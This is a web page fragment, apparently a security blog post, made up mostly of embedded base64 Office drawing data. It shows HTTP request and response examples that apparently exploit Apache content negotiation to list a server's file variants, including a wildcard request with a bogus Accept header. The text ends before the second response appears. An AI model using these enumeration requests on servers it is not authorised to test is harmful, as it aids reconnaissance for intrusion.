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
AAAABQAFAGcBAAArEAAAAAA=
" o:spid="_x0000_s1026" style="height: 294.75pt; left: 0px; margin-left: 54pt; margin-top: 393.7pt; position: absolute; visibility: visible; width: 484.6pt; z-index: 251659264;" type="#_x0000_t202">
<v:shadow color="black" offset=".74836mm,.74836mm" opacity="26214f" origin="-.5,-.5">
<v:textbox>
<!--[if !mso]-->
<!--[endif]--></v:textbox>
<w:wrap anchorx="margin"></w:wrap></v:shadow></v:shape></span></span><br />
<table cellpadding="0" cellspacing="0" style="width: 100%px;"><tbody>
<tr><td><div>
<div class="MsoNormal" style="margin-left: 0cm;">
<b style="mso-bidi-font-weight: normal;"><span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">Response:<o:p></o:p></span></b></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<b style="mso-bidi-font-weight: normal;"><span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;"><br /></span></b></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">HTTP/1.1
300 <span style="background: yellow; mso-highlight: yellow;">Multiple Choices</span><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">Date:
Tue, 16 Sep 2014 12:56:46 GMT<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">Server:
Apache/2.2.22 (Linux/SUSE)<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="background: yellow; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt; mso-highlight: yellow;">Alternates:
{"glossary.html.de" 1 {type text/html} {charset iso-8859-1}
{language de} {length 32714}}, {"glossary.html.en" 1 {type
text/html} {charset iso-8859-1} {language en} {length 27855}},
{"glossary.html.es" 1 {type text/html} {charset iso-8859-1} {language
es} {length 23586}}, {"glossary.html.fr" 1 {type text/html}
{charset iso-8859-1} {language fr} {length 30561}},
{"glossary.html.ja.utf8" 1 {type text/html} {charset utf-8}
{language ja} {length 30880}}, {"glossary.html.ko.euc-kr" 1 {type
text/html} {charset euc-kr} {language ko} {length 19474}},
{"glossary.html.tr.utf8" 1 {type text/html} {charset utf-8}
{language tr} {length 30911}}</span><span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">Vary:
negotiate,accept-language,accept-charset<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">TCN:
list<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">Content-Length:
1039<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">Connection:
close<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">Content-Type:
text/html; charset=iso-8859-1<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<b style="mso-bidi-font-weight: normal;"><span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">…[omitted]…<o:p></o:p></span></b></div>
</div>
<!--[if !mso]--></td>
</tr>
</tbody></table>
</div>
<div>
<b>Note:</b> In the first example we request for a specific file, the glossary.html and get the response displayed above.<br />
<span lang="EN-US" style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><span lang="EN-US" style="font-size: 11pt;"><b style="font-family: Calibri, sans-serif; font-size: 14.6666669845581px;"><br /></b></span></span>
<span lang="EN-US" style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><span lang="EN-US" style="font-size: 11pt;"><b style="font-family: Calibri, sans-serif; font-size: 14.6666669845581px;">Example 2:</b></span></span><br />
<span lang="EN-US" style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><span lang="EN-US" style="font-size: 11pt;"><b><br /></b></span></span>
<span lang="EN-US" style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><span lang="EN-US" style="font-size: 11pt;"><v:shapetype coordsize="21600,21600" id="_x0000_t202" o:spt="202" path="m,l,21600r21600,l21600,xe">
<v:stroke joinstyle="miter">
<v:path gradientshapeok="t" o:connecttype="rect">
</v:path></v:stroke></v:shapetype><v:shape fillcolor="#d9d9d9" id="Text_x0020_Box_x0020_26" o:gfxdata="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
4LulFJhmTmnmmFZOaeWUdk6BxVl2X5JTOtCp9BUHXLHpHw/ltxmwgstuP/Km6lzNrf8FAAD//wMA
UEsDBBQABgAIAAAAIQCcZkZBuwAAACQBAAAqAAAAY2xpcGJvYXJkL2RyYXdpbmdzL19yZWxzL2Ry
YXdpbmcxLnhtbC5yZWxzhI/NCsIwEITvgu8Q9m7SehCRJr2I0KvUBwjJNi02PyRR7Nsb6EVB8LIw
s+w3s037sjN5YkyTdxxqWgFBp7yenOFw6y+7I5CUpdNy9g45LJigFdtNc8VZ5nKUxikkUigucRhz
DifGkhrRykR9QFc2g49W5iKjYUGquzTI9lV1YPGTAeKLSTrNIXa6BtIvoST/Z/thmBSevXpYdPlH
BMulFxagjAYzB0pXZ501LV2BiYZ9/SbeAAAA//8DAFBLAQItABQABgAIAAAAIQC75UiUBQEAAB4C
AAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAK0w
P/HBAAAAMgEAAAsAAAAAAAAAAAAAAAAANgEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAA11
P8UVBQAAVCYAAB8AAAAAAAAAAAAAAAAAIAIAAGNsaXBib2FyZC9kcmF3aW5ncy9kcmF3aW5nMS54
bWxQSwECLQAUAAYACAAAACEA4VE3H88GAADmGwAAGgAAAAAAAAAAAAAAAAByBwAAY2xpcGJvYXJk
L3RoZW1lL3RoZW1lMS54bWxQSwECLQAUAAYACAAAACEAnGZGQbsAAAAkAQAAKgAAAAAAAAAAAAAA
AAB5DgAAY2xpcGJvYXJkL2RyYXdpbmdzL19yZWxzL2RyYXdpbmcxLnhtbC5yZWxzUEsFBgAAAAAF
AAUAZwEAAHwPAAAAAA==
" o:spid="_x0000_s1026" style="height: 192pt; left: 0px; margin-left: 54pt; margin-top: 75pt; position: absolute; visibility: visible; width: 484.6pt; z-index: 251659264;" type="#_x0000_t202"><br /></v:shape></span></span><br />
<b>Request:</b><br />
<br />
GET /ba* HTTP/1.1<br />
Host:xxx<br />
Accept: application/whatever; q=1.0<br />
Accept-charset: iso-8859-9<br />
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0<br />
Connection: close<br />
Referer: http://xxx.xxx.xxx.xxx/manual/de/<br />
Cookie: LangID=2; PHPSESSID=xxxx<br />
<br />
<v:shapetype coordsize="21600,21600" id="_x0000_t202" o:spt="202" path="m,l,21600r21600,l21600,xe">
<v:stroke joinstyle="miter">
<v:path gradientshapeok="t" o:connecttype="rect">
</v:path></v:stroke></v:shapetype><v:shape fillcolor="#d9d9d9" id="Text_x0020_Box_x0020_26" o:gfxdata="UEsDBBQABgAIAAAAIQC75UiUBQEAAB4CAAATAAAAW0NvbnRlbnRfVHlwZXNdLnhtbKSRvU7DMBSF
dyTewfKKEqcMCKEmHfgZgaE8wMW+SSwc27JvS/v23KTJgkoXFsu+P+c7Ol5vDoMTe0zZBl/LVVlJ
gV4HY31Xy4/tS3EvRSbwBlzwWMsjZrlprq/W22PELHjb51r2RPFBqax7HCCXIaLnThvSAMTP1KkI
+gs6VLdVdad08ISeCho1ZLN+whZ2jsTzgcsnJwldluLxNDiyagkxOquB2Knae/OLUsyEkjenmdzb
mG/YhlRnCWPnb8C898bRJGtQvEOiVxjYhtLOxs8AySiT4JuDystlVV4WPeM6tK3VaILeDZxIOSsu
ti/jidNGNZ3/J08yC1dNv9v8AAAA//8DAFBLAwQUAAYACAAAACEArTA/8cEAAAAyAQAACwAAAF9y
ZWxzLy5yZWxzhI/NCsIwEITvgu8Q9m7TehCRpr2I4FX0AdZk2wbbJGTj39ubi6AgeJtl2G9m6vYx
jeJGka13CqqiBEFOe2Ndr+B03C3WIDihMzh6RwqexNA281l9oBFTfuLBBhaZ4ljBkFLYSMl6oAm5
8IFcdjofJ0z5jL0MqC/Yk1yW5UrGTwY0X0yxNwri3lQgjs+Qk/+zfddZTVuvrxO59CNCmoj3vCwj
MfaUFOjRhrPHaN4Wv0VV5OYgm1p+LW1eAAAA//8DAFBLAwQUAAYACAAAACEAWCzsB9oFAABcLwAA
HwAAAGNsaXBib2FyZC9kcmF3aW5ncy9kcmF3aW5nMS54bWzsWt1u2zYYvR+wdyB0tQG1LcmWZGtV
ijSt0wFpEsTOdjEMBS3RlhqK1Ej6r0WBPc0ebE+yj5Qsyw3WAomLDYhiIBFF+vB8h98hJYbPX2xy
ilZEyIyzyHK6toUIi3mSsUVk3U7HnaGFpMIswZQzEllbIq0XJ99/9xyHC4GLNIsRIDAZ4shKlSrC
Xk/GKcmx7PKCMKibc5FjBUWx6CUCrwE5pz3Xtv1ejjNmneyhXmGF0VJkD4CiPL4jyRlmKywBksZh
807FkcaPR8YhW52LYlJcC808vlxdC5QlkQXKMZyDRFavqqiaQbH32bcWe4DNXOS6PZ/P0Say/KE3
tAFqG1l9r98PAq+EIxuFYl3veIOBCw1iaOHZju14dtVhevVliDh9/RUQoFnSgYsGRVlogmx1P+aB
vwt6qgm+5Bvk+nX8uj1SG7gLmWXGWRYXME4SMX6WYrYgp0LwdUpwInWLUihQtOzIiLbrU2qs2fot
T0BhvFTc4B1JvDpuHBZCqnPCc6QvIkuQWJme8OpCqpLgrokWRXKaJeOMUlPYyjMq0ArTyII0T/ja
QhRLBTcja2x+DBZd5hBH2W7o2TDcJmPgth5B83VzC2hJA2kS6KArytA6skae65W6HtAQi1nNA9Cr
DjRas1meKSIQzfLIgoyrGuFQj8ZrlhhGCme0vIYvU6ZjJPM5SAJa6AJfAsQkTdZoRpfiBoMLPNuk
b5Jp9fpDR+dykkH8blB2gjBdwEyjqIUEV79mKp2kuIBBtU0kWtya/Izi+K6UnxYpLqUZ7LgCp6q1
0acmY0oNnjrwyq1qMzG5rJMy2eoQZvAXMguoGAfDTAgXKRcfLLSG+S2y5B9LLAgM5M8MknTkDAYQ
kTKFgRdoJ4pmzaxZg1kMUBCshcrLMwUl+MqyENkihZ5KWzB+Chk9z6oEKzlpdlSqidpSYkbDMK8C
kUX8ksx1E7i6VrKUxi9TyQTcqD+dm9H615amXqtZTmlCwwoQhYJFI4uwzu0EFoEPwFZnia6t1TXE
UoiF6ngMn2b26ZyvOR00o1hlDKltQeY4htE/wzSbicxCBWZc6nRw7bHtwW/9Gdh9/RtqMxWnY5xn
VE+QcCNOsZDEDJ7hQvA3AI1lA3Sa5USiS7JGNzzH7ICxa/vA1AO+mnn/HmMHVtNDxiA7SK2FUydv
uFTIcfpdd9iFPOs6XqBXDpBVtzK6s+QaC3zTHJzzl9XgaK/dH5xWaDAcpAZISGr1TLH0k1bsvzcV
mu3mgkNrtaNXj15tkxsiC84kCVtzHHEW+h+bo53UyvXuK6vHdHrdc7oOGtgDdMkVGvMlS1qPtB5p
n7B2T1iwwUBCNF2SZ8jx0YQUyLWdAXL6Yb8fOkN0/nbaGqY1TGuYnWEmRMArcYhOCwy7ej23Cx8X
/XCRseWmN7mdvP6x9ctT9cvB+7xsX/sf+tp/SmEXjcHKJEP00XoDj3HvLq+m78ZXt5evuqnKaXeF
hYUc9FFvlyAFO609ffsT+ljtJaBM8s5w6I06LtzU2zZLvCAolrpE2EKlKBh4nz49ezS+08RPSAPf
94+OT9ge33ecB+DXUpCGFP5o9ACoe1IfSDEXe6rB8Pj4C7zHHzr9o/PP1B7fH7mPxIctO7fzvtCQ
u1x83wggGDxGILKMO3dG7h32Hd+TD+zji8O01Sof+cPhI8W579OigR/YwTHwD5KzUJ1ZMz+940tU
NPLHDR6bP0aigxBEY4j94/jLa6anbOrjHH8qk6t9CgXuUfQZNfmrJn8Ppvr2seypPpa1W8b3t4x/
wWIbIhzHBObC3Zr0rCpXK3vrmNYx7Yv/7sX/jDNFmOpcmNeHEDaVR61BWoO0BmkYhMFJGDg2F6KY
wpGF1h6tPVp7NOxh1o8pbFmF+z2rn+rjL/WWldMa52kYpz3j0jy89uV/5v/951+/cTihqUjyO1y3
FvmmFtGH7OoToUtJJsUNLO3lobHyyCi00Kege5+dKzfnyKpz8PrwerN88g8AAAD//wMAUEsDBBQA
BgAIAAAAIQDhUTcfzwYAAOYbAAAaAAAAY2xpcGJvYXJkL3RoZW1lL3RoZW1lMS54bWzsWc1v3EQU
